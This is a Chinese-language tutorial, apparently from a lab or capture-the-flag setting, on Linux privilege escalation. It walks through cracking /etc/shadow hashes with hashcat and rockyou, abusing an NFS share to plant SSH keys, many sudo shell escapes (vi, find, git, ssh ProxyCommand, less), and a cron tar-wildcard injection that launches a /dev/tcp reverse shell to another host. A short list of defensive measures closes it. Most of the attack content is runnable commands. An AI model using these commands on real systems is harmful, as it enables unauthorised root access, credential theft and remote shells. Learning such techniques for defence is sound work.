Linux提权技术深度解析：从基础到实战<\/h1>

1. 哈希破解与密码获取<\/h2>

1.1 哈希识别与破解<\/h3>
在Linux系统中，\/etc\/passwd<\/code>和\/etc\/shadow<\/code>文件存储了用户账户信息。当获取到哈希值时：<\/p>


识别哈希类型<\/strong>：<\/p>
hash-identifier AzER3pBZh6WZE
<\/span><\/span><\/code><\/pre><\/li>

使用Hashcat破解<\/strong>：<\/p>
hashcat -m 1500<\/span> -a 0<\/span> hash \/usr\/share\/wordlists\/rockyou.txt --force
<\/span><\/span><\/code><\/pre>
-m 1500<\/code>：指定DES(Unix)哈希类型<\/li>
-a 0<\/code>：使用字典攻击模式<\/li>
--force<\/code>：强制运行（在某些系统上可能需要）<\/li>
<\/ul>
<\/li>
<\/ol>
1.2 获取的凭证格式<\/h3>
username:insecurity
password:AzER3pBZh6WZE:P@ssw0rd
<\/code><\/pre>
2. NFS利用技术<\/h2>
2.1 NFS共享发现与挂载<\/h3>


发现NFS共享<\/strong>：<\/p>
showmount -e 192.168.8.104
<\/span><\/span><\/code><\/pre><\/li>

创建挂载点并挂载<\/strong>：<\/p>
sudo mkdir \/mnt\/lin_peter
<\/span><\/span>sudo mount 192.168.8.104:\/home\/peter \/mnt\/lin_peter -o vers=<\/span>3<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.2 通过NFS实现权限提升<\/h3>


创建匹配UID的用户<\/strong>：<\/p>
sudo adduser -u 1001<\/span> peter
<\/span><\/span><\/code><\/pre><\/li>

SSH密钥注入<\/strong>：<\/p>
su peter
<\/span><\/span>ssh-keygen -t ssh-rsa
<\/span><\/span>mkdir \/mnt\/lin_peter\/.ssh\/
<\/span><\/span>cp ~\/.ssh\/id_rsa.pub \/mnt\/lin_peter\/.ssh\/authorized_keys
<\/span><\/span>ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa'<\/span> -i ~\/.ssh\/id_rsa peter@192.168.8.104
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. Sudo提权技术<\/h2>
3.1 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>3.2 常见sudo提权方法<\/h3>


直接shell访问<\/strong>：<\/p>
sudo \/bin\/bash
<\/span><\/span>sudo \/bin\/sh
<\/span><\/span>sudo \/bin\/ash
<\/span><\/span>sudo \/bin\/dash
<\/span><\/span>sudo \/bin\/csh
<\/span><\/span>sudo \/bin\/zsh
<\/span><\/span><\/code><\/pre><\/li>

通过环境变量提权<\/strong>：<\/p>
sudo env \/bin\/sh
<\/span><\/span><\/code><\/pre><\/li>

通过文本编辑器提权<\/strong>：<\/p>
sudo vi -c ':!\/bin\/sh'<\/span> \/dev\/null
<\/span><\/span>sudo pico
<\/span><\/span>^R^X
<\/span><\/span>reset; sh 1>&0<\/span> 2>&0<\/span>
<\/span><\/span><\/code><\/pre><\/li>

通过脚本语言提权<\/strong>：<\/p>
sudo perl -e 'exec "\/bin\/sh";'<\/span>
<\/span><\/span>sudo tclsh
<\/span><\/span>exec \/bin\/sh <@stdin >@stdout 2>@stderr
<\/span><\/span><\/code><\/pre><\/li>

通过Git提权<\/strong>：<\/p>
TF=<\/span>$(<\/span>mktemp -d)<\/span>
<\/span><\/span>ln -s \/bin\/sh "<\/span>$TF\/git-x"<\/span>
<\/span><\/span>sudo git "--exec-path=<\/span>$TF"<\/span> x
<\/span><\/span><\/code><\/pre><\/li>

通过find命令提权<\/strong>：<\/p>
sudo find . -exec \/bin\/sh \;<\/span> -quit
<\/span><\/span><\/code><\/pre><\/li>

通过socat提权<\/strong>：<\/p>
sudo socat stdin exec:\/bin\/sh
<\/span><\/span><\/code><\/pre><\/li>

通过SSH提权<\/strong>：<\/p>
sudo ssh -o ProxyCommand=<\/span>';sh 0<&2 1>&2'<\/span> x
<\/span><\/span><\/code><\/pre><\/li>

通过man命令提权<\/strong>：<\/p>
sudo man man
<\/span><\/span>!\/bin\/sh
<\/span><\/span><\/code><\/pre><\/li>

通过less\/more提权<\/strong>：<\/p>
sudo less \/etc\/profile
<\/span><\/span>!\/bin\/sh
<\/span><\/span>
<\/span><\/span>TERM=<\/span> sudo more \/etc\/profile
<\/span><\/span>!\/bin\/sh
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4. 定时任务提权<\/h2>
4.1 检查定时任务<\/h3>
crontab -l
<\/span><\/span><\/code><\/pre>4.2 利用定时任务执行恶意代码<\/h3>


创建反向shell脚本<\/strong>：<\/p>
echo '\/bin\/bash -i >& \/dev\/tcp\/192.168.8.103\/10032 0>&1'<\/span> > reverse.sh
<\/span><\/span>chmod +x reverse.sh
<\/span><\/span><\/code><\/pre><\/li>

利用tar的checkpoint特性<\/strong>：<\/p>
echo ""<\/span> > --checkpoint=<\/span>1<\/span>
<\/span><\/span>echo ""<\/span> > "--checkpoint-action=exec=sh reverse.sh"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. strace提权技术<\/h2>
sudo strace -o \/dev\/null \/bin\/sh
<\/span><\/span><\/code><\/pre>6. 防御措施<\/h2>

最小权限原则<\/strong>：限制sudo权限，只授予必要的命令<\/li>
定期审计<\/strong>：检查sudoers文件和crontab<\/li>
NFS安全<\/strong>：限制NFS共享的访问权限<\/li>
哈希安全<\/strong>：使用强密码和加盐哈希<\/li>
更新系统<\/strong>：及时修补已知漏洞<\/li>
<\/ol>
7. 总结<\/h2>
本文详细介绍了多种Linux提权技术，包括：<\/p>

哈希破解<\/li>
NFS共享利用<\/li>
Sudo权限滥用<\/li>
定时任务注入<\/li>
strace提权<\/li>
<\/ul>
每种技术都有其特定的应用场景和限制条件，安全人员应了解这些技术以更好地防御系统。<\/p>